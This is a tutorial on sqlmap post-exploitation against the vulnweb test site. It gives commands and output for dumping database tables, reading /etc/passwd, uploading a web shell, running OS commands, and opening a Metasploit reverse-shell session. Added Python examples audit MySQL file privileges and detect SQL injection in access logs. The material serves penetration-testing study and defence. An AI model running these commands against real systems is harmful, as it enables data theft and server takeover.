SQLMap Post-Exploitation

After a sqlmap scan finishes, a message like the following means the parameter is vulnerable:

[INFO] Parameter: "id" of type "integer" is vulnerable to boolean-based blind injection.

Next, check target.txt to confirm the injection point; post-exploitation work can then begin, as shown below:

/.local/share/sqlmap/output# cat testphp.vulnweb.com/target.txt 
http://testphp.vulnweb.com/artists.php?artist=1 (GET)  
/.local/share/sqlmap/output# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --privileges

Gathering basic information

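--current-db Show the database the web application is currently using

--current-user Show the database account the web application is currently using

--users List all database users

--privileges View DB privileges

--passwords List the password hashes of the database users, and also try to crack them to recover the plaintext

--schema List the schema

--exclude-sysdbs Used together with --schema to list the schema of all non-system databases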


Viewing DB privileges

#sqlmap  -u http://testphp.vulnweb.com/artists.php?artist=1  --privileges
...omit...
database management system users privileges:
[*] 'acuart'@'localhost' [1]:
privilege: USAGE

Finding where the database is stored

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --sql-shell  
sql-shell> select @@datadir
...omit...
select @@datadir: '/var/lib/mysql/'
...omit...

Viewing the schema of non-system databases

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --schema --exclude-sysdbs
...omit...
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int         |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int          |
| cat_id | int          |
| img    | varchar(50)  |
| pic_id | int          |
| plong  | text         |
| price  | int          |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+
...omit...


Viewing database contents


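--dbs List all DB names
--tables List all table names
--columns List all column information
-D Specify the DB; to specify several, separate the DB names with commas
-T Specify the tables; to specify several, separate the table names with commas
-C Specify the columns; to specify several, separate the column names with commas
--count List how many rows of data there are
--dump Dump all the data
--where Add a filter condition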


List all DB names

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
...omit...
available databases [2]:                                                                                                                 
[*] acuart
[*] information_schema

List all table names in database acuart

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
...omit...
Database: acuart                                                                                                                         
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

List the number of rows in table users of database acuart

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --count
...omit...
Database: acuart
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 10       |
+--------+---------+
...omit...

List all column names of table users in database acuart

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
...omit...
Database: acuart                                                                                                                         
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

List the data in the email column of table users in database acuart, and export it to CSV

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C email --dump
...
Database: acuart
Table: users
[1 entry]
+-------------------------+
| email                   |
+-------------------------+
| polola@dino.querumaself |
+-------------------------+
[22:35:53] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'

List the rows in the products table that match rewritename like '%camera%'

# sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch -D acuart -T products  --where="rewritename like '%camera%'"  --dump
...omit...
[11:14:17] [INFO] fetching entries for table 'products' in database 'acuart'
Database: acuart
Table: products
[1 entry]
+----+-------+---------------------------+-------------------+---------------------------+
| id | price | name                      | rewritename       | description               |
+----+-------+---------------------------+-------------------+---------------------------+
| 2  | 10    | Web Camera A4Tech PK-335E | web-camera-a4tech | Web Camera A4Tech PK-335E |
+----+-------+---------------------------+-------------------+---------------------------+
...omit...


File system access

Reading files

Option: --file-read

sqlmap -r sql.txt --file-read=/etc/passwd

sqlmap -r sql.txt --file-read="C:\boot.ini"


Uploading files

Options: --file-write and --file-dest

sqlmap.py -r sql.txt --file-write=shell.php --file-dest=/var/www/html/shell.php
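
On a MySQL backend, whether file reads and writes through the database can succeed depends on the web application's database account holding the global FILE privilege and on the server's secure_file_priv setting. The audit below is an added example, not code from the original page; the grant lines are constructed (the first mirrors the USAGE privilege shown earlier), and the 'legacy' account and function names are hypothetical.

```python
import re

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)", re.I)

def global_privileges(show_grants_lines):
    """Collect the privileges granted ON *.* from SHOW GRANTS output lines."""
    privs = set()
    for line in show_grants_lines:
        m = GRANT_RE.match(line.strip())
        if m and m["scope"] == "*.*":          # FILE can only be granted globally
            privs |= {p.strip().upper() for p in m["privs"].split(",")}
    return privs

def file_exposure(show_grants_lines, secure_file_priv):
    """Classify how far an account can reach into the server's file system.

    secure_file_priv: None for NULL, "" for no restriction, else a directory.
    """
    privs = global_privileges(show_grants_lines)
    if not privs & {"FILE", "ALL PRIVILEGES"}:
        return "none"                          # LOAD_FILE() returns NULL for this account
    if secure_file_priv is None:
        return "disabled"                      # server refuses import/export operations
    if secure_file_priv == "":
        return "unrestricted"                  # any path the mysqld OS user can reach
    return f"confined:{secure_file_priv}"

# Constructed sample input: a least-privilege web account and an over-privileged one.
WEBAPP = ["GRANT USAGE ON *.* TO 'acuart'@'localhost'",
          "GRANT SELECT, INSERT, UPDATE ON `acuart`.* TO 'acuart'@'localhost'"]
OVERPRIV = ["GRANT SELECT, FILE ON *.* TO 'legacy'@'localhost'"]

if __name__ == "__main__":
    print(file_exposure(WEBAPP, ""))           # account cannot touch files at all
    print(file_exposure(OVERPRIV, ""))         # worst case: FILE and no path restriction
```

An account that reports "none", like the USAGE-only account above, is the target state for a web application's database user.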


Running SQL statements

One statement at a time: --sql-query

$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --sql-query="select * from users"

Entering the SQL shell: --sql-shell

$ sqlmap -r Downloads/ptsmsqli.request --sql-shell
...omit...
[07:39:14] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>  

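Note:
When the --os-shell feature executes non-query SQL statements (such as UPDATE, INSERT, DELETE, DROP), the database must support stacked queries. If the database does not support them, these non-query statements cannot be executed.

Common SQL statements

  • select @@datadir Show where the DB is stored
  • select @@servername Show the servername
  • select @@hostname Show the hostname
  • SELECT LOAD_FILE('/etc/passwd')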

Reference
https://websec.ca/kb/sql_injection
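
Seen from the web server, the enumeration and SQL shell statements above leave recognisable traces in the access log. The detector below is an added example, not code from the original page; it assumes the Combined Log Format, the log lines and client addresses are constructed, and the burst threshold is an arbitrary starting point.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format (assumed): ip - - [time] "METHOD uri PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Tokens from the statements on this page, plus generic boolean/UNION probes.
SQL_TOKENS = re.compile(
    r"information_schema|@@(?:datadir|hostname|servername)|load_file\s*\(|"
    r"union\s+(?:all\s+)?select|\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)

def scan(lines, burst=20):
    """Return {client_ip: sorted reasons} for clients that look like SQLi tooling."""
    reasons = defaultdict(set)
    values = defaultdict(set)       # (ip, path, param) -> distinct decoded values
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                # not in the assumed log format
        ip = m["ip"]
        # Default User-Agent only; --random-agent changes it, so this is one signal of several.
        if m["ua"].lower().startswith("sqlmap/"):
            reasons[ip].add("sqlmap user-agent")
        url = urlsplit(m["uri"])
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            if SQL_TOKENS.search(value):
                reasons[ip].add(f"sql tokens in '{param}'")
            values[(ip, url.path, param)].add(value)
    # Blind injection asks many yes/no questions through a single parameter.
    for (ip, path, param), seen in values.items():
        if len(seen) >= burst:
            reasons[ip].add(f"{len(seen)} distinct values for '{param}' on {path}")
    return {ip: sorted(found) for ip, found in reasons.items()}

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:11:14:01 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 5328 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [10/Jan/2024:11:14:02 +0000] "GET /artists.php?artist=1%20AND%205=5 HTTP/1.1" 200 5328 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [10/Jan/2024:11:14:02 +0000] "GET /artists.php?artist=1%20AND%205=6 HTTP/1.1" 200 4699 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.9 - - [10/Jan/2024:11:20:00 +0000] "GET /artists.php?artist=-1%20UNION%20SELECT%20@@datadir HTTP/1.1" 200 4700 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2024:11:21:00 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG, burst=3).items():
        print(ip, found)
```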


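Running operating system commands

Running a single command

Option: --os-cmd (only one command can be run at a time)

Run the ls command

sqlmap -r sql.txt --os-cmd ls

Run the id command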

# sqlmap -r sql.txt -p item --os-cmd id
...omit...
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

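Using a shell

This emulates a shell that can run arbitrary commands, so multiple commands can be run.

Option: --os-shell

After it starts, sqlmap asks you to choose the web application language and a writable location.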

# sqlmap -r sql.txt --os-shell
...omit...
which web application language does the web server support?
[1] ASP 
[2] ASPX
[3] JSP
[4] PHP (default)
> 4              # As my Target system web server supports PHP 
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
...omit...
[12:39:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 

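Once a writable location is confirmed, sqlmap uploads the shell and provides an interactive shell interface.

Connecting with third-party tools

Option: --os-pwn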

# sqlmap -r sql.txt --os-pwn
...omit...
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
...omit...
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

If Metasploit was selected above, the following choices appear:

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1         # Reverse TCP is a good choice for establishing a connection
what is the local address? [Enter for '192.168.1.101' (detected)] # No need to change LHost, LPort
which local port number do you want to use? [47984] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
...omit...
meterpreter >

References
http://iosec.in/sqlmap-4/
https://www.cybersecmastery.in/2022/12/operating-system-takeover-with-sqlmap.html


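Clearing sqlmap's cache from a previous run

Method 1

Flush the session file

Option: --flush-session

Use this option if you do not want to reuse the session file previously cached for this target. It clears the earlier session and tests the target again from scratch.

Method 2

Ignore the query results stored in the session file

Option: --fresh-queries

Method 3

Directly delete the target's directory under the sqlmap output folder

It is usually located at /home/kali/.local/share/sqlmap/output/<target>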

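That directory usually contains the following files:

  • session.sqlite: all of sqlmap's test results are saved in this file
  • log: after sqlmap finds a vulnerability, the commands that are run are recorded here
  • target.txt: records the original sqlmap detection command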
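
Because the output folder also holds dumped table data (the users.csv path in the log line earlier), it is worth listing what each target directory contains before deleting it at the end of an engagement. The helper below is an added example, not part of the original page or of sqlmap; the function names are hypothetical, and it assumes the dump/<db>/<table>.csv layout seen above and that each CSV starts with a header row.

```python
import csv
import shutil
from pathlib import Path

def first_line(path):
    """First line of a text file, or None if it cannot be read."""
    try:
        with open(path, errors="replace") as fh:
            return fh.readline().strip()
    except OSError:
        return None

def inventory(output_root):
    """Map each target directory to the artifacts sqlmap left in it."""
    report = {}
    for d in sorted(p for p in Path(output_root).iterdir() if p.is_dir()):
        dumps = {}
        # Dump layout as in the log line on this page: dump/<db>/<table>.csv
        for csv_path in sorted(d.glob("dump/*/*.csv")):
            with open(csv_path, newline="", errors="replace") as fh:
                rows = sum(1 for _ in csv.reader(fh))
            # Assumption: the first CSV row is the column header.
            dumps[f"{csv_path.parent.name}.{csv_path.stem}"] = max(rows - 1, 0)
        report[d.name] = {
            "target": first_line(d / "target.txt"),
            "has_session": (d / "session.sqlite").is_file(),
            "has_log": (d / "log").is_file(),
            "dumped_rows": dumps,
        }
    return report

def purge(output_root, target):
    """Method 3: delete one target's directory, refusing anything outside the root."""
    root = Path(output_root).resolve()
    doomed = (root / target).resolve()
    if doomed.parent != root or not doomed.is_dir():
        raise ValueError(f"{target!r} is not a target directory under {root}")
    shutil.rmtree(doomed)

if __name__ == "__main__":
    root = Path.home() / ".local/share/sqlmap/output"   # usual location named above
    if root.is_dir():
        for name, info in inventory(root).items():
            print(name, info)
```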